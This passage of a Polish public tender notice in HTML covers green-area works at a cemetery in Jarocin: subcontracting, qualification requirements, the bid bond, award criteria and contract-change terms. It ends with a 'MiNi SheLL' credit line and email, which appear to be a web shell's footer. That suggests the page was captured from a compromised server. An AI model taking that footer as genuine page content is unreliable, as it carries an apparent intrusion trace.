o przeprowadzenie kontroli przez Państwową Inspekcję Pracy.
5.4.6.	Postanowienia pkt. 5.4.1.  5.4.4. stosuje się odpowiednio do podwykonawców.
5.5. Ilekroć w niniejszej SIWZ lub w jakichkolwiek dokumentach stanowiących załączniki do niniejszej SIWZ przedmiot zamówienia został opisany przez wskazanie znaków towarowych, patentów lub pochodzenia, w takim przypadku w/w wskazania traktować należy jako podane przykładowo, a Zamawiający dopuszcza zastosowanie rozwiązań równoważnych.
5.6. Ilekroć w niniejszej SIWZ lub w jakichkolwiek dokumentach stanowiących załączniki do niniejszej SIWZ przedmiot zamówienia został opisany za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 
1  3 Pzp Zamawiający dopuszcza rozwiązania równoważne opisywanym. W przypadku, gdy dokumentacja techniczna/projekt wykonawczy bądź SST/STWiOR zawierać będzie nazwę producenta lub firmy, Zamawiający zastrzega możliwość zastosowania innych materiałów - równoważnych - jednak o parametrach nie gorszych niż opisane w dokumentacji i przedmiarze.
5.7.	Podwykonawstwo: 
a) 	Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia,  
b) 	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy,
c) 	Zamawiający żąda wskazania przez Wykonawcę części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, i podania przez Wykonawcę firm podwykonawców, zgodnie z pkt. 10.8 Tomu I (IDW) SIWZ.
<br /><br /><b>II.5) Główny kod CPV: </b>77000000-0<br /><b> Dodatkowe kody CPV:</b>77310000-6,
                77211600-8,
                77211500-7,
                77314100-5,
                77313000-7,
                45112710-5,
                45231400-9,
                45316110-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 65<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin wykonania zamówienia: 
1)	rozpoczęcie realizacji robót, o których mowa w pkt. 5.1. umowy nastąpi w dniu protokolarnego przekazania terenu zagospodarowania;
2)	przekazanie terenu zagospodarowania nastąpi niezwłocznie  ale nie później niż 
w ciągu 7 dni  po zakończeniu robót budowlanych związanych z realizacją zadania polegającego na budowie przyłącza i studzienki wodociągowej dla których inwestorem jest PWIK Sp. z o.o. w Jarocinie.
Zakończenie realizacji robót, o których mowa w pkt. 5.1. umowy i zgłoszenie przez Wykonawcę gotowości do odbioru robót nastąpi w terminie 65 dni od dnia przekazania terenu zagospodarowania.
Utrzymanie i pielęgnacja zieleni obejmuje okres od dnia odbioru końcowego do dnia 31.12.2017 r.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa ww. warunku udziału w postępowaniu.<br />
                Informacje dodatkowe
                NIE DOTYCZY.<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa ww. warunku udziału w postępowaniu.<br />
                Informacje dodatkowe
                NIE DOTYCZY.<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)	w zakresie doświadczenia:
Zamawiający uzna spełnienie przez Wykonawcę przedmiotowego warunku, jeżeli Wykonawca wykaże, że: w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej:
- 1 robotą polegającą na urządzaniu/modernizacji skweru lub zagospodarowaniu terenów zieleni o wartości minimum 90.000,00 zł (brutto).

b) w zakresie kwalifikacji zawodowych:
Zamawiający uzna spełnienie przez Wykonawcę przedmiotowego warunku, jeżeli Wykonawca wykaże, że zapewni, wśród osób, które będą uczestniczyć w wykonywaniu zamówienia: 
- osobą do pełnienia funkcji kierownika prac z uprawnieniami Inspektora Nadzoru Prac w Zielni,
- osobą do pełnienia funkcji kierownika budowy z uprawnieniami do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                NIE DOTYCZY.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy. Ponadto, na wezwanie Zamawiającego Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, zobowiązany jest także do przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego powyżej. </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty, b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami,<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />NIE DOTYCZY.</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">NIE DOTYCZY.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. 2.Ofertę stanowi wypełniony i podpisany formularz Oferta. Do oferty należy załączyć: 1) Oświadczenia wymagane postanowieniami pkt 9.2 IDW; 2) Oświadczenia dla podmiotów, na zdolnościach lub sytuacji których polega Wykonawca, wymagane postanowieniami pkt 10.6. IDW; 3) Zobowiązania wymagane postanowieniami pkt 10.2. IDW, w przypadku gdy Wykonawca polega na zdolnościach innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu. 4) Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii; 5) Dokumenty, z których wynika prawo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych oświadczeń lub dokumentów składanych wraz z ofertą, chyba, że Zamawiający może je uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne Dz.U. z 2014 poz. 1114 oraz z 2016 poz. 352), a Wykonawca wskazał to wraz ze złożeniem oferty. o ile prawo do ich podpisania nie wynika z dokumentów złożonych wraz z ofertą; 6) Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz. 
7)Kosztorys ofertowy.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />16.1	Wysokość wadium (przepisy art. 45. PZP).
Zamawiający ustalił wysokość wadium w kwocie 6.000,00 zł (słownie: sześć tysięcy złotych, 00/100). Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
16.2.  Forma wadium.
Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być, co najmniej gwarancją nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego.
W przypadku wnoszenia wadium w formie niepieniężnej jako Beneficjenta należy wskazać: Gmina Jarocin, Al. Niepodległości 10, 63-200 Jarocin.
16.3.	Miejsce i sposób wniesienia wadium:
16.3.1.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy na nr konta: 91 1090 1131 0000 0000 1300 1942 z dopiskiem Wadium w przetargu nieograniczonym na Modernizacja terenów zieleni, tj. Cmentarz choleryków zlokalizowanego przy ul. Wrocławskiej w Jarocinie.
Zamawiający, wymaga by wadium wnoszone w innych formach niż w pieniądzu, 
a dopuszczonych do wniesienia zgodnie z ustawą Pzp, było złożone w oryginale 
wraz z ofertą - przed upływem terminu składania ofert. Złożenie oryginału dokumentu potwierdzającego wniesienie wadium w innych formach niż pieniądz,
o którym mowa w niniejszym punkcie jest wymagane jako warunek konieczny.
16.3.2.	 Zaleca się, by do oferty dołączyć kopię dokumentu potwierdzającego wniesienie wadium, tzn. potwierdzoną przez Wykonawcę za zgodność z oryginałem, kopię polecenia przelewu na konto Zamawiającego lub potwierdzoną przez Wykonawcę za zgodność z oryginałem, kopię dokumentu będącego każdą inną formą wadium dopuszczoną przez Zamawiającego. Załączenie w/w kopii do oferty, o których mowa w niniejszym punkcie jest pożądane, lecz nie jest to warunek konieczny.
16.4.	Termin wniesienia wadium
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
16.5.	Zwrot wadium
16.5.1.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
16.5.2.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
16.5.3.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
16.5.4.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium w przypadku, o którym mowa w pkt. 16.5.1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
16.5.5.	W pozostałych sprawach dotyczących zwrotu wadium, nieuregulowanych w niniejszym dziale SIWZ, mają zastosowanie przepisy ustawy Pzp.
16.6.	Utrata wadium
16.6.1.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, 
o których mowa w art. 25 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
16.6.2.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>20</td></tr><tr><td>czas reakcji</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br />NIE DOTYCZY.<br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br />NIE DOTYCZY.<br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br />NIE DOTYCZY.<br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Strony przewidują możliwość dokonywania zmian w Umowie. Zmiana Umowy dopuszczalna będzie w granicach wyznaczonych przepisami Pzp, w tym art. 144 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z  2015 r., poz. 2164 ze zm.) oraz określonych w niniejszej umowie.
2.Poza przypadkami określonymi w paragrafach poprzedzających, zmiany Umowy będą mogły nastąpić w następujących warunkach:
1)Terminu realizacji zamówienia wraz ze skutkami wprowadzenia tych zmian; termin realizacji zamówienia może ulec zmianie w przypadku:
a)z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
b)z powodu wystąpienia dodatkowych okoliczności, a niemożliwych do przewidzenia (przed zawarciem umowy) przez doświadczonego wykonawcę robót, polegających na:
- konieczności usunięcia kolizji z niezinwentaryzowaną infrastrukturą lub innych obiektów,
- konieczności przeprowadzenia dodatkowych badań lub ekspertyz. 
c)z powodu okoliczności siły wyższej, przez którą strony będą rozumieć np. wystąpienie zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu, ludzi lub grożącego powstaniem szkody 
w znacznych rozmiarach;
d)z powodu szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów;
e)wykopalisk uniemożliwiających prowadzenie robót budowlanych, niewypałów 
i niewybuchów;
f)odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych (kategorie gruntu, kurzawka itp.) oraz warunków terenowych, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
g)jeżeli wystąpiły zmiany bądź opóźnienia będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
- wstrzymanie robót przez Zamawiającego;
- konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;
- przedłużająca się procedura przetargowa w przypadku wydłużenia terminu związania z ofertą do dnia podpisania umowy;
h)jeżeli powstaną okoliczności będące następstwem działania organów administracji, 
w szczególności:
- przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji itp.;
- odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej;
i)jeżeli powstały konieczne zmiany technologiczne, w szczególności konieczności zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych, technologicznych niż wskazane w dokumentacji projektowej w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem projektu;
j)opóźnienia Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań: 
- przekazania terenu zagospodarowania;
- przekazania dokumentacji (pozwolenie na budowę, dokumentacji projektowej, specyfikacji technicznych);
- przekazanie dokumentów zamiennych lub usunięcia wad w dostarczanej dokumentacji projektowej;
- kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami, ale w takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji.
2)Wynagrodzenia za przedmiot zamówienia wraz ze skutkami wprowadzenia takiej zmiany; wynagrodzenie wykonawcy może ulec zmianie:
- w przypadku zaistnienia konieczności zmniejszenia zakresu robót (niewykonania lub zaniechania prac objętych umową) przez Zamawiającego;
- w przypadku wprowadzenia robót zamiennych wprowadzonych przez Wykonawcę zaakceptowanych przez właściwego Inspektora Nadzoru i Zamawiającego;
- w związku z powykonawczym zestawieniem kosztów - zmiany ilości obmiarowych w stosunku do ilości przedmiarowych.
3.Zmiana terminu realizacji zamówienia może nastąpić o okres uzasadniony przyczynami zmiany, o którym mowa w ust.2 pkt.1.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />NIE DOTYCZY.<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />NIE DOTYCZY.<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/05/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferta powinna być sporządzona w języku polskim, z zachowaniem formy pisemnej pod rygorem nieważności<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com